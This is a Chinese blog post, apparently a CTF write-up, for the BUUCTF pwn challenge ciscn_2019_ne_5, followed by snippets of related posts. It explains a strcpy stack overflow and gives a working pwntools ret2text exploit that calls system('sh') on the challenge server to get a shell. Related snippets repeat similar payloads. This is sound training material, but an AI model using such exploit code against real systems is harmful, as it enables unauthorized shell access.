ciscn_2019_ne_5

原创 已于 2023-02-04 17:29:11 修改 · 97 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux

于 2022-12-24 19:57:27 首次发布
本文详细介绍了针对32位程序的栈不可执行保护的漏洞利用,通过ida静态分析发现关键的addlog和getflag函数,特别是getflag中的strcpy函数存在溢出风险。通过构造ROP链,利用程序中已有的system函数和gad、sh字符,最终实现getshell。实验中还展示了如何确定填充长度并提供了exploit代码。

首先checksec查看程序保护机制和位数。32位程序,只开了栈不可执行保护。

ida中静态分析一下,首先要经过password的认证。

主要的功能函数有四个,第四个getflag函数只有在调试分析的时候才会看到,正常运行都是不知道的。(一开始看到这四个功能函数的时候还以为遇到了堆题,2333

 关键的函数就两个,addlog和getflag两个函数。

addlog函数对于我们输入内容的长度没有检测

getflag函数中strcpy函数可以造成溢出

至此,一条rop链思路就出来了,利用程序中system函数调用的gad以及sh字符进行getshell。ROPgadget找到sh字符地址。

另外就是调试需要填充的长度了,可以看到dest形参与ebp的长度是0x48,加上ebp的长度,总共是0x52.

 下面是exp

from pwn import *
from LibcSearcher import *
context(os="linux",arch = "i386")

#++++++++++++++++++++++++++++++++++++++++
filename = "./rop"
# p = process(filename)
p = remote("node4.buuoj.cn",29110)
elf = ELF(filename)
#++++++++++++++++++++++++++++++++++++++++
r = lambda : p.recv()
ru = lambda x : p.recvuntil(x)
sl = lambda x : p.sendline(x)
itr = lambda : p.interactive()
leak = lambda addr : log.success("{:x}".format(addr))

def add_log(message):
	ru("0.Exit")
	sl("1")
	ru("Please input new log info:")
	sl(message)

def display():
	ru("0.Exit")
	sl("2")

def print_log():
	ru("0.Exit")
	sl("3")

def cat_flag():
	ru("0.Exit")
	sl("4")

ru("Please input admin password:")
sl("administrator")

system_call = 0x080486B9
sh = 0x080482ea
padding = "a"*0x48
fake_ebp = "dead"
payload = flat(padding,fake_ebp,system_call,sh)
add_log(payload)
cat_flag()
itr()

[CTF] ciscn_2019_ne_5
凉水的博客
06-13 608
ciscn_2019_ne_5
【BUUCTFPWN】ciscn_2019_ne_5
m0_55368674的博客
01-15 352
【BUUCTFPWN】ciscn_2019_ne_5
[PWN]ciscn_2019_ne_5
LDX的博客
11-27 353
PWN ciscn_2019_ne_5
BUUCTF ciscn_2019_ne_5
最新发布
2401_88087539的博客
01-14 535
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 2105
buuctf ciscn_2019_ne_5题目分析
BUUCTF 刷题 ciscn_2019_ne_5
Helloity的博客
02-10 2386
先附上题目地址:BUUCTF在线评测 首当其冲checksec,开启了NX保护,32位程序。 Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 还是蛮有意思的一道题,我的IDA有些问题,无法f5主函数,那么就看汇编。我先运行了一下题目,发现要我们输入一个密码,但
BUUCTF pwn——ciscn_2019_ne_5
CNS-Enterprise BCC-1701-J
04-09 301
BUUCTF 做题练习
ciscn_2019_n_5
、moddemod
06-17 476
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level = 'debug') proc_name = './ciscn_2019_n_5' # p = process(proc_name) p = remote('node3.buuoj.cn', 28451) elf = ELF(proc_name) p.sendline('a'.encode()).
[BUUCTF]PWN——ciscn_2019_ne_5
mcmuyanga的博客
10-04 2785
ciscn_2019_ne_5 题目附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,看一下程序的大概执行情况 32位ida载入,shift+f12查看程序里的字符串,发现了flag字符串 双击跟进,ctrl+x找到调用的函数,得到提示我们输入的log就是flag 看一下main函数,s1在接收admin的密码administrator,这边读入了100个长度的字符,看到15行,给s1的大小只有48,这边存在溢出漏洞 根据之前那个flag的提示,之后我们应该选1,添加一个log,之后
BUUCTF(pwn)ciscn_2019_ne_5
半岛铁盒的博客
03-30 288
先点进去 cat flag 说了 在 1 log中 from pwn import* r=remote('node3.buuoj.cn',26204) sys=0x80486b9 sh=0x080482ea r.sendlineafter("Please input admin password:",administrator) r.sendlineafter("0.Exit\n:",1) payload='a'*(0x48+4)+p32(sys)+p32(sh) r.sendlineaf...
buuctf ciscn_2019_ne_5
carol2358的博客
04-21 1169
ret2text 覆盖dest需要0x48+0x4,sh可以用gdb的find找到,别忘了写4个字符的返回地址 exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_ne_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' ...
BUU-ciscn_2019_ne_5
qq_45771413的博客
04-27 414
检查保护 IDA 逻辑不是很复杂, 第一次提示输入admin密码,密码要输入administrator才能下一步 接着是输入功能选项(0~3) 第一个输入,看起来没啥用,但是传入的是src字符串,返回的也是src 第二个输出,进去只有一个put,一无所有 第三个是打印,里面发现了system函数 第四个本应该是’0’选项,这里多了个’4’,函数名叫getflag,进去看是个输出flag的函数,初步预测跳转到这里就可以了。 第五个才是’0’的退出 int __cdecl main(int argc,
UEFITool_NE_A51:Windows平台下的UEFI工具
### UEFITool_NE_A51_win32.zip 解读 #### 标题知识点 **UEFITool_NE_A51_win32.zip** 指的是一份压缩包文件,其名称表明了它的功能和适用平台。从标题可以拆解以下几点重要信息: 1. **UEFITool**:这是软件的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值